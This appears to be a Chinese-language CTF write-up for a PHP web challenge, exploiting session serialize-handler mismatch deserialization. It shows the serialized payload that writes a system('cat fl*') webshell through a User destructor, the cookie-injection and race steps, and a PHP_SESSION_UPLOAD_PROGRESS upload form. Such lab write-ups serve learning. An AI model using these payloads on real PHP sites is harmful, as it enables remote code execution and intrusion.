一切看起来都那么合情合理
这道题是羽师傅和atao师傅建议我去做的,最开始自己下载了源代码进行参考,发现里面有好多代码就放弃了,过了几天才去看有一个hint。
分析了好久才发现自己之前做过类似的题,考察的知识点也是一样的。于是自己又来记录一下
还有就是感谢羽师傅和atao师傅的建议
这里我就不详细介绍知识点啦,因为之前自己也总结过,师傅们也写过该知识点
https://blog.csdn.net/qq_46091464/article/details/108006422
https://blog.csdn.net/qq_46091464/article/details/108006459
一 、代码审计发现利用点
通过www.zip下载源代码进行代码审计
因为题目的hint说明了是利用序列化,那我们就直接找class类
在inc/inc.php里面发现了class类和利用点
下面是自己把inc.php里面重要的代码copy下来
<?php
error_reporting(0);
ini_set('display_errors', 0);
ini_set('session.serialize_handler', 'php');//漏洞利用点一
class User{
public $username;
public $password;
public $status;
function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function setStatus($s){
$this->status=$s;
}
function __destruct(){
file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
//利用的函数 写入一句话
}
}
//代码定义了一个User类,将利用file_put_contents()函数写入类属性值
//该函数就是我们的利用点二
现在我们就要利用session进行序列化执行User类的file_put_contents()函数写入一句话,得到flag
然后查看index.php文件
<?php
error_reporting(0);
session_start();//开启了session回话
//超过5次禁止登陆
if(isset($_SESSION['limit'])){
$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);
$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);
}else{
setcookie("limit",base64_encode('1'));
$_SESSION['limit']= 1;
}
?>
//在index.php里面开启了session回话,并且这里的$_SESSION的值我们可以控制
//我们就可以通过$_SESSION的值传递我们的payload入服务器的/tmp/sess_xxx生成我们构造的序列化payload
然后查看check.php文件
<?php
error_reporting(0);
require_once 'inc/inc.php';//利用点
//check.php里面最重要的就是require_once 'inc/inc.php',我们就可以访问check.php进行执行我们构造好的payload
//因为该文件包含了inc.php文件,而inc.php文件里面会根据ini_set('session.serialize_handler', 'php');的设置去读取/tmp/sess_xxxx文件里面的内容并且进行反序列化,执行file_put_contents()函数。
二、思路
分析完代码,我们的思路就比较明确啦,我们可以利用index.php里面的session_start()设置,控制$_SESSION的值(也就是limit)写入我们的payload到服务器的/tmp/sess_xxxx,然后利用inc.php里面的ini_set('session.serialize_handler', 'php')设置去反序列化服务器上的/tmp/sess_xxxx文件,从而执行inc.php里面User类的file_put_contents()函数写入一句话
三、操作
构造payload
<?php
error_reporting(0);
class User{
public $username;
public $password;
public $status;
function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function setStatus($s){
$this->status=$s;
}
}
$a =new User("1.php","<?php system('cat fl*');?>");
echo base64_encode(serialize($a));//进行base64编码,因为index.php是进行了base64解码
?>
//O:4:"User":3:{s:8:"username";s:5:"1.php";s:8:"password";s:26:"<?php system('cat fl*');?>";s:6:"status";N;}
//然后在payload前面添加"|"
// |O:4:"User":3:{s:8:"username";s:5:"1.php";s:8:"password";s:26:"<?php system('cat fl*');?>";s:6:"status";N;}
最后base64编码一下
然后我们抓包修改index.php里面的Cookie的limit值
但是有一个问题就是我们写入的session马上又会被删除,使用我们利用bp不断的发包然后访问check.php或者inc/inc.php都可以
下面自己是访问inc/inc.php
最后访问log-1.php查看flag
这里提醒一下写入文件命名是log-1.php
file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
这里自己吃亏啦,是羽师傅告诉自己的,哎,还是自己没有认真看代码
成功获得flag
四、使用PHP_SESSION_UPLOAD_PROGRESS进行写入文件
其实有些时候我们控制session的值,就可以使用PHP_SESSION_UPLOAD_PROGRESS进行文件上传形成条件竞争写入session的值
总结:主要思想
session.upload_progress.enabled为On。session.upload_progress.enabled本身作用不大,是用来检测一个文件上传的进度。但当一个文件上传时,同时POST一个与php.ini session.upload_progress.name同名的变量时(session.upload_progress.name的变量值默认为PHP_SESSION_UPLOAD_PROGRESS)
PHP检测到这种同名请求会在$_SESSION中添加一条数据。我们由此来设置session。
拓展:这个题的思想一点点像wmctf make php great again
#poc.php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>poc</title>
</head>
<body>
<form action="http://c7e9680e-8c37-4f9d-b650-d3c4f3a21bed.chall.ctf.show/inc/inc.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="panda" />
<input type="file" name="file" />
<input type="submit" />
</form>
</body>
</html>
抓包修改数据提交payload
然后不断发数据包
最后访问log-2.php
利用成功!!!
五、总结
非常感谢羽师傅和atao师傅让自己去做这个题,和他们的帮助
2821
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
